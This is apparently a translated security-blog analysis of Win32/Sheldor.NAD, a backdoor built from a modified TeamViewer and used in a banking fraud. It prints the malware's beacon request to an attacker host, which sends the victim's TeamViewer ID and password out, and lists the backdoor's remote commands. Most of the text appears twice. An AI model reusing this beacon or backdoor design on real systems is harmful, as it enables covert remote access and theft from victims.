TeamViewer, as a component of a Win32 / Sheldor.NAD backdoor
Recently, ESET analysts discovered an interesting malware - Win32 / Sheldor.NAD, which is a modification of the popular remote computer administration software - TeamViewer.
This information was obtained during the examination as part of the investigation of the incident initiated by Group-IB and related to fraud in the RBS systems. In this case, the attackers managed to conduct several fake transactions and steal about 5 million rubles.
Win32 / Sheldor.NAD - is installed via a Trojan installer program that injects a modified version of the popular remote administration package into the system - TeamViewer fifth version. Moreover, many components contain a legal digital signature:
')
Since, in fact, in this modified version, all the changes are contained in the tv.dll module, when we discovered this backdoor, most anti-virus solutions simply did not notice it, because without directly analyzing the code it was not so easy to determine that it was malicious.
Now things are much better - http://www.virustotal.com/file-scan/report.html?id=9f3ff234d5481da1c00a2466bc83f7bda5fb9a36ebc0b0db821a6dc3669fe4e6-1295272165 .
Immediately after installing the malware, the server side is launched and then a continuous relationship with the administrative panel of attackers takes place, which can connect to the infected computer at any time and perform any actions with the privileges of the user under which the malicious program was launched or monitor it.
The information exchange between the admin and the infected machine basically consists of the following:
GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1 HTTP / 1.1
User-Agent: x3
Host: goeiuyi.net
where the id = 414 034 883 field is the session ID on the TeamViewer network, and pwd = 6655 is the password, respectively. With these two identifiers, you can easily connect to a remote computer from anywhere in the world. Back bot can receive the following commands from the control center:
exec - calls the winapi function ShellExecute ()
power_off - calls the winapi ExitWindowsEx () function with the EWX_POWEROFF parameter
shutdown - calls the winapi ExitWindowsEx () function with the EWX_SHUTDOWN parameter
killbot - removes all installed files and cleans up created registry keys
The choice of intruders was not made by chance precisely on the TeamViewer program, since it is quite popular with system administrators, and you can not immediately suspect a catch. In addition, the connection to the remote computer is carried out through proxy servers for TeamViewer, which allows attackers to hide their IP address from which the connection is made. This also leaves less evidence to investigate, since requesting the necessary data from the TeamViewer software development company is rather slow and can take several months.
This information was obtained during the examination as part of the investigation of the incident initiated by Group-IB and related to fraud in the RBS systems. In this case, the attackers managed to conduct several fake transactions and steal about 5 million rubles.
Win32 / Sheldor.NAD - is installed via a Trojan installer program that injects a modified version of the popular remote administration package into the system - TeamViewer fifth version. Moreover, many components contain a legal digital signature:
')
Since, in fact, in this modified version, all the changes are contained in the tv.dll module, when we discovered this backdoor, most anti-virus solutions simply did not notice it, because without directly analyzing the code it was not so easy to determine that it was malicious.
Now things are much better - http://www.virustotal.com/file-scan/report.html?id=9f3ff234d5481da1c00a2466bc83f7bda5fb9a36ebc0b0db821a6dc3669fe4e6-1295272165 .
Immediately after installing the malware, the server side is launched and then a continuous relationship with the administrative panel of attackers takes place, which can connect to the infected computer at any time and perform any actions with the privileges of the user under which the malicious program was launched or monitor it.
The information exchange between the admin and the infected machine basically consists of the following:
GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1 HTTP / 1.1
User-Agent: x3
Host: goeiuyi.net
where the id = 414 034 883 field is the session ID on the TeamViewer network, and pwd = 6655 is the password, respectively. With these two identifiers, you can easily connect to a remote computer from anywhere in the world. Back bot can receive the following commands from the control center:
exec - calls the winapi function ShellExecute ()
power_off - calls the winapi ExitWindowsEx () function with the EWX_POWEROFF parameter
shutdown - calls the winapi ExitWindowsEx () function with the EWX_SHUTDOWN parameter
killbot - removes all installed files and cleans up created registry keys
The choice of intruders was not made by chance precisely on the TeamViewer program, since it is quite popular with system administrators, and you can not immediately suspect a catch. In addition, the connection to the remote computer is carried out through proxy servers for TeamViewer, which allows attackers to hide their IP address from which the connection is made. This also leaves less evidence to investigate, since requesting the necessary data from the TeamViewer software development company is rather slow and can take several months.
Source: https://habr.com/ru/post/112032/
All Articles